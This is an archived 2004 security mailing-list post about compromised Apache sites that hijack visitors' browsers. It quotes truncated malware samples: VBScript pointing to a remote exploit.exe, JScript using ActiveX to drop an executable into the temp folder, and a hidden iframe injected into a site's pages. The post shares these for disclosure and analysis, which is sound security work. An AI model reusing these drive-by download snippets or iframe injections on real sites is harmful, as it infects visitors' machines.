[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040523171655.78454.qmail@web60606.mail.yahoo.com>
From: geggam692000 at yahoo.com (D B)
Subject: browser hijack by apache sites
using konqueror i got it to download these two files
Filename 1: 2DimensionOfExploitsEnc.php
<html>
<script language=vbs>
szURL = "http://www.pizdato.biz/acc1/exploit.exe"
</script>
<script language="VBScript.Encode">
Filename 2: object2.cfm
<script language=jscript>
self.moveTo(5000,5000);
self.close();
fs=new ActiveXObject("Scripting.FileSystemObject");
fname=fs.GetSpecialFolder(2)+'\\q381275.exe';
a=fs.CreateTextFile(fname,true);
a.Write('MZ');
a.Close();
a=fs.OpenTextFile(fname,8,false,true);
>Message: 1
>From: Filbert <filbert@...dora.be>
>Reply-To: filbert@...dora.be
>To: full-disclosure@...ts.netsys.com
>Date: Sun, 23 May 2004 15:19:30 +0200
>Organization: Hell
>Subject: [Full-Disclosure] browser hijack by apache
>sites
>Hi,
>This is the second time this weekend that I've been
>warned of an apache
>site
>on a Linux server were a line of code was added to
>redirect browsers to
>porn
>sites.
>First was the site of a Belgian political party.
>Second came today, and
>as of
>writing this it's still there. The admin was informed
>so it can be gone
>soon.
>hxxp://www.previsit.com/carrefour/nl/ <- hxxp must
>changed to http
>IE users do NOT click.
>the code added at the bottom is:
><iframe SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1
>HEIGHT=1></iframe></body>
>anyone seen this before? What vulnerability is
>exploited here? FP?
>Thx,
>Filb.
__________________________________
Do you Yahoo!?
Yahoo! Domains – Claim yours for only $14.70/year
http://smallbusiness.promotions.yahoo.com/offer
Powered by blists - more mailing lists